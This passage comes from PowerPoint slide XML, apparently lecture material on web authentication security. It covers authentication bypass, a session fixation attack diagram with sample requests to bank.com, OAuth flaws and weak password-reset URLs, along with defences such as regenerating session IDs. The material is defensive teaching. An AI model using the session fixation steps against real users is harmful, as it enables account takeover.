              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=BGH23110915103939 observed at 15:10 of November 9, 2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Long-lived authenticators make these attacks more likely to succeed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24023997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a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bypassing Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form-based authentication may be bypassed using carefully crafted arguments (e.g., using SQL injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak password recovery procedures can be leveraged to reset a victim’s password to a known value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication can be bypassed using forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See discussion on authorization, later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication can be bypassed because of EAR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See discussion on EAR, later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication can be bypassed through session fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34462789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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934919" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="1670782"/>
            <a:ext cx="4800600" cy="8001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934920" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="1956532"/>
            <a:ext cx="4800600" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934921" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2299432"/>
            <a:ext cx="4800600" cy="8001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934922" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2362200" y="3270982"/>
            <a:ext cx="4648200" cy="6286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934923" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="3556732"/>
            <a:ext cx="4648200" cy="6286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934924" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2528032"/>
            <a:ext cx="0" cy="1143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934925" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="597820">
            <a:off x="3512693" y="1828232"/>
            <a:ext cx="3457575" cy="338554"/>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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(1) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>login.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934926" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="655346">
            <a:off x="3429000" y="2084912"/>
            <a:ext cx="2781300" cy="338554"/>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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(2) session=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934928" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="560135">
            <a:off x="2751725" y="2458670"/>
            <a:ext cx="4905375" cy="338554"/>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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(6) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>balance.py?session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934929" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21544728">
            <a:off x="1829698" y="2730875"/>
            <a:ext cx="3745325" cy="630942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(3) Attacker lures victim into clicking on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>login.py?session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934930" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21206097">
            <a:off x="2281239" y="3285062"/>
            <a:ext cx="4429125" cy="338554"/>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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(4) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>login.py?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=55181</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934932" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21173791">
            <a:off x="2209801" y="3513662"/>
            <a:ext cx="6194425" cy="338554"/>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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(5) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>form.py?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>joe&amp;pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>foo&amp;session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934933" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="3613882"/>
            <a:ext cx="1183963" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934934" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1229785" y="4471132"/>
            <a:ext cx="828134" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934935" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1213582"/>
            <a:ext cx="1031051" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="serv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3965" y="2532752"/>
            <a:ext cx="853797" cy="1035050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1597727"/>
            <a:ext cx="1083402" cy="701705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="700059" y="1579585"/>
            <a:ext cx="629394" cy="728773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="3803996"/>
            <a:ext cx="1030029" cy="667136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42858047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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="935939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If application accepts blindly an existing session ID, then the initial setup phase is not necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session IDs should always be regenerated after login and never allow to be “inherited”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session fixation can be composed with cross-site scripting to achieve session id initialization (e.g., by setting the cookie value)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33541872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A3FC-CF25-AB66-CEBF-C2D48899DB75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25ECD4B-B290-E9EF-733C-DEE27EC4AC62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The OAuth protocol is complex and can lead to vulnerabilities  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The incorrect management of the information sent by the provider might allow an attacker to impersonate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provider-side implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of checks leak the token to third parties who can access the user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26597584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680F-6CC6-12F2-EE7E-10DDCB2C5CC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Reset Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC45BDC2-A6FD-01B2-2646-F4E8511497F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential reset procedures are notoriously hard to get right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trade-off between usability and security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flawed reset URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a reset URLs contains information that can be interpreted by an attacker to create different reset URLs one could reset any known user password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad: http://acme.com/creds-reset?user=dmlnbmE=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good: http://acme.com/creds-reset?token=8837ED621A6B4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flawed reset protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cheatsheetseries.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cheatsheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Forgot_Password_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28872319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Authentication is critical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not transfer security-critical information in the clear</a:t>
